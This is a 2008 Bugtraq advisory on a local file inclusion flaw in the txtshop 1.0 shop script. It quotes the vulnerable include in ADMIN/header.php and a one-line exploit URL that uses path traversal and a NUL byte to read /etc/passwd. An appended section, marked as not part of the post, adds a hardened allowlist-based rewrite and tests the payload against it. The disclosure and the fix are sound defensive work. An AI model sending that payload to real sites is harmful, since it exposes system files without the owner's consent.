Date: Thu, 23 Oct 2008 11:32:12 +0200
From: Pepelux <pepelux@...e-sec.org>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com
Subject: txtshop - beta 1.0 / Local File Inclusion Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
txtshop - beta 1.0 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: txtshop
$ Version: <= 1.0
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/txtshop/

Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

-- Bug --

4. if (!$language)$language="ch";
5. include_once("../lib/lang.".$language.".php");

-- Exploit --

http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
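
A hardened form of the two quoted lines, as an added example that is not part of the original post and is not txtshop code. The function name resolve_lang_file, the temporary demo directory and the sample inputs are constructed for illustration. It assumes language files are named lang.<code>.php in a single lib directory, and that $language reaches header.php from the request (the quoted lines never assign it from $_GET).

```php
<?php
// Added example, not txtshop code. Assumption: language files are named
// lang.<code>.php inside one lib directory, as the quoted include suggests.

// Map a requested language code to a file inside $libDir; anything that is
// not an existing, well-formed code falls back to $default.
function resolve_lang_file(?string $requested, string $libDir, string $default = 'ch'): string
{
    // Allowlist built from the files actually present, keyed by code.
    $allowed = [];
    foreach (glob($libDir . '/lang.*.php') ?: [] as $path) {
        if (preg_match('/\Alang\.([a-z]{2,8})\.php\z/', basename($path), $m)) {
            $allowed[$m[1]] = $path;
        }
    }
    // Strict format check: no "/", "..", NUL byte or other path syntax passes.
    if ($requested === null || !preg_match('/\A[a-z]{2,8}\z/', $requested)
        || !isset($allowed[$requested])) {
        $requested = $default;
    }
    if (!isset($allowed[$requested])) {
        throw new RuntimeException('default language file is missing');
    }
    // Defence in depth: the resolved path must still sit under $libDir.
    $base = realpath($libDir);
    $real = realpath($allowed[$requested]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file resolves outside lib directory');
    }
    return $real;
}

// Constructed demo: a throwaway lib directory with two language files.
$lib = sys_get_temp_dir() . '/langdemo_' . bin2hex(random_bytes(4));
mkdir($lib);
file_put_contents("$lib/lang.ch.php", "<?php // constructed sample\n");
file_put_contents("$lib/lang.en.php", "<?php // constructed sample\n");
// The last input is the parameter value from the advisory, URL-decoded.
$inputs = ['en', null, 'EN', '/../../../../../etc/passwd' . "\0"];
foreach ($inputs as $in) {
    printf("%-40s => %s\n", json_encode($in), basename(resolve_lang_file($in, $lib)));
}
// In header.php the call site would be (reading $_GET explicitly instead of
// relying on a global populated from the request):
//   $lang = is_string($_GET['language'] ?? null) ? $_GET['language'] : null;
//   include_once resolve_lang_file($lang, __DIR__ . '/../lib');
array_map('unlink', glob("$lib/lang.*.php"));
rmdir($lib);
```

Only 'en' selects lang.en.php; every other input, including the advisory's value, resolves to the default lang.ch.php. The check does not depend on how the PHP build treats a NUL byte in a path.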